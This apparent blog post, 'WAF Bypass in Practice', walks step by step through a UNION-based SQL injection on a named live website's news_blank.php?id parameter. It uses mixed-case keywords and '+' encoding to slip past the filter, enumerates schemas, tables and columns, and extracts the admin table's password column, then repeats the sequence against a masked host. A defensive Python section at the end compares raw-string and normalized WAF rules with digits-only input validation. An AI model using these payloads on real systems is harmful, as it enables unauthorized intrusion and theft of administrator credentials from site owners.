WAF Bypass in Practice

Site address:

http://www.ghtcghtc.com

Injection point:

http://www.ghtcghtc.com/news_blank.php?id=35

  1. http://www.ghtcghtc.com/news_blank.php?id=36-1 (confirms the parameter is numeric)
  2. http://www.ghtcghtc.com/news_blank.php?id=35 and 1=1 (blocked)
  3. http://www.ghtcghtc.com/news_blank.php?id=35+and+1=1
  4. http://www.ghtcghtc.com/news_blank.php?id=35+and+1=2
  5. order by (determined that there are 11 columns)
  6. -35+union+select+1,2,3,4,5,6,7,8,9,10,11 (positions 4 and 8 are displayed)
  7. -35+union+select+1,2,3,(database()),5,6,7,8,9,10,11

  8. 35+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name%20as%20char))),5,6,7,8,9,10,11%20from%20information_schema.schemata%20limit%202,1

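HEX() function: returns the hexadecimal string representation of a value.

UNHEX() function: converts each pair of hexadecimal digits into one character.

The CAST function explicitly converts an expression of one data type to another data type. The argument to CAST() is an expression consisting of the source value and the target data type, separated by the AS keyword.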

  9. +UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,8,9,10,11 from information_schema.tables where table_schema='hengdong' limit 0,1

  10. +UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,8,9,10,11 from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4
  11. +UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,8,9,10,11  from hdwl_admin

Another solution:

http://xxx.com/news_blank.php?id=296 and 1=1

http://xxxxx.com/news_blank.php?id=296+and+1=1

http://xxxx.com/news_blank.php?id=296+and+1=2

http://xxxx.com/news_blank.php?id=296 order by 11  (correct)

http://xxxx.com/news_blank.php?id=296 order by 12  (error)

http://xxxx.com/news_blank.php?id=296 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11  (blocked)

http://xxxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,4,5,6,7,8,9,10,11--+

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,user(),5,6,7,version(),9,10,11--+

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name as char))),5,6,7,version(),9,10,11 from information_schema.schemata limit 1,2

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,version(),9,10,11  from information_schema.tables where table_schema='hengdong' limit 0,1

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,version(),9,10,11  from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4

http://xxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,version(),9,10,11  from hdwl_admin
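
From the defender's side, the requests above get through because the filter inspects the raw query string, while PHP decodes `+` and `%20` to spaces before the value reaches the SQL statement. The following is an added example, not code from the original post or from any WAF product: the rule names, the naive rule and the helper functions are assumptions made for illustration. It compares a raw-string rule with matching after normalization, and with digits-only validation of the numeric `id` parameter.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical naive WAF rule: matched against the raw query value,
# case-sensitive, and expecting literal spaces around keywords.
NAIVE_RULE = re.compile(r" and \d+=\d+| union select ")

# Illustrative rules matched after normalization (not a complete rule set).
NORMALIZED_RULES = {
    "boolean-test": re.compile(r"\band \d+ ?= ?\d+"),
    "union-select": re.compile(r"\bunion select\b"),
    "order-by-probe": re.compile(r"\border by \d+"),
    "schema-enum": re.compile(r"\binformation_schema\."),
}

def normalize(raw_value):
    """Decode '+' and %XX as PHP does for $_GET, collapse whitespace, lowercase."""
    decoded = unquote_plus(raw_value)
    return re.sub(r"\s+", " ", decoded).strip().lower()

def naive_hit(raw_value):
    return NAIVE_RULE.search(raw_value) is not None

def normalized_hits(raw_value):
    text = normalize(raw_value)
    return sorted(name for name, rule in NORMALIZED_RULES.items() if rule.search(text))

def is_valid_id(raw_value):
    """Positive validation: the id parameter is numeric, so accept digits only."""
    return re.fullmatch(r"[0-9]{1,10}", unquote_plus(raw_value)) is not None

# Raw id values as they appear in the walkthrough above, plus one benign value.
SAMPLES = [
    "35",
    "36-1",
    "35 and 1=1",
    "35+and+1=1",
    "-35+union+select+1,2,3,4,5,6,7,8,9,10,11",
    "35+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name%20as%20char))),5,6,7,8,9,10,11%20from%20information_schema.schemata%20limit%202,1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s[:40]!r:45} naive={naive_hit(s)!s:5} "
              f"normalized={normalized_hits(s)} valid_id={is_valid_id(s)}")
```

Pattern rules only reduce noise; the digits-only check (or a cast to integer with a parameterized query in the application) rejects every request in the walkthrough, including the `36-1` probe.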

posted @ zdytom